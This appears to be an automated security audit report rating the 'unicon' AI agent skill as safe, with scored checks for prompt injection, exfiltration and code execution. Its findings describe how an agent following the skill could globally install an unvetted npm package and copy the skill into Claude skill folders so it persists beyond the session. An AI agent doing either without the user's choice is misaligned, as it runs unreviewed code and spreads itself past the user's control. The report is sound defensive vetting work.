Is charlesrhoward/unicon safe?

https://github.com/openclaw/skills/tree/main/skills/charlesrhoward/unicon

91
SAFE

The charlesrhoward/unicon skill is a clean, legitimate documentation helper for the Unicon icon library CLI. SKILL.md contains only markdown documentation with no prompt injection patterns, no hidden instructions, no credential-harvesting directives, and no executable code. Canary files remained fully intact throughout the audit and install-time network activity was limited to the expected GitHub monorepo clone. The principal residual risk is the skill's instruction to globally install @webrenew/unicon via npm — that package is outside this audit's scope and should be independently reviewed before agent-assisted installation.

Category Scores

Prompt Injection 91/100 · 30%
Data Exfiltration 88/100 · 25%
Code Execution 88/100 · 20%
Clone Behavior 100/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 85/100 · 5%

Findings (4)

LOW Recommended npm package is unaudited -12

SKILL.md instructs agents and users to run 'npm install -g @webrenew/unicon' as the primary setup step. This npm package was not installed or audited as part of this skill review. npm packages can execute arbitrary code via preinstall/postinstall lifecycle hooks and the installed binary runs with the user's full filesystem and network access. The SKILL.md content itself is clean, but any agent following its Quick Start instructions will install an unvetted third-party package.

LOW Skill self-replication via unicon skill command -9

The skill documents a 'unicon skill --ide claude' command that writes a copy of SKILL.md to .claude/skills/unicon/SKILL.md. If an agent executes this command (e.g., when helping a user set up the tool), the skill propagates and persists beyond the current session. The feature is explicitly documented rather than hidden, but it creates a mechanism for the skill to install itself into additional AI agent contexts without the user explicitly choosing to do so through the normal skill management channel.

INFO Credential files accessed during monitoring window -12

Inotify and auditd logs record reads of six credential files (.env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, .gcloud/application_default_credentials.json) at two timestamps: audit sequence 261-266 at 1771652663.680 (approximately monitoring initialization) and sequence 1434-1439 at 1771652680.672 (approximately monitoring teardown). All six files are accessed within a single millisecond in each batch — a pattern characteristic of the Oathe canary baseline snapshot process rather than sequential malicious reads. Canary integrity confirmed no modification or exfiltration. Attribution to monitoring infrastructure rather than the skill is assessed with high confidence.

INFO Icon queries transmitted to external unicon.sh API -15

All CLI operations (search, get, bundle, info) issue HTTP requests to https://unicon.sh/api. User search terms and icon names leave the local environment and are logged by a third-party service. The UNICON_API_URL environment variable allows redirecting these requests to an arbitrary host, meaning a compromised shell environment could silently redirect queries. This is disclosed in the skill documentation and represents a privacy consideration rather than an active threat in the skill itself.